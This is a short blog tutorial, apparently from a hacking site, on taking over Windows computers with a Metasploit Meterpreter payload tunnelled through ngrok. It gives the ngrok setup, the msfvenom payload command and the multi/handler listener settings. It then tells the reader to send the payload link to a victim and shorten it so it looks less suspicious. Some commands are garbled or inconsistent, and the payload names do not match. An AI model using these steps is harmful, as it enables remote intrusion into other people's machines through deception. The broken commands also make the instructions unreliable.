Spread the love

Hi and welcome to Hacking Vision so today lets get a little more advance in are exploits were going to hack windows with a reverse http payload

let start sign up to ngrok and get the auth token

and sign up ones you got a account and get your authtoken once you got the authtoken download ngrok and unzip it with unzip /path/to/ngrok.zip once unziped gave it promising using chmod 755 ngrok then type ./ngrok authtoken <YOUR_AUTH_TOKEN> once it complete type ./ngrok http 2323 or what ever port u wanna open

and paste the ngrok url in to targets

now hit create host name and open terminal type this command msfvenom -p windows/meterpreter/http LHOST=520f6cc2.ngrok.io LPORT=2323 X> hahah.exe

now type service postgersql start

and service apache2 start

and msfconsole

now use exploit/multi/handler

set payload to windows/meterpreter/reverse_https

set lhost 127.0.0.1

set lport 2323

now type exploit and send the ngrok link to a target personalty i use link victum

me personly i shortening the link and then send it as dont look as shady

THANK YOU for reading and happy hacking lads and remember with great power comes a greater chance getting chought

If you have found a spelling error, please, notify us by selecting that text and pressing Ctrl+Enter.

yoast seo premium free

Spelling error report

The following text will be sent to our editors: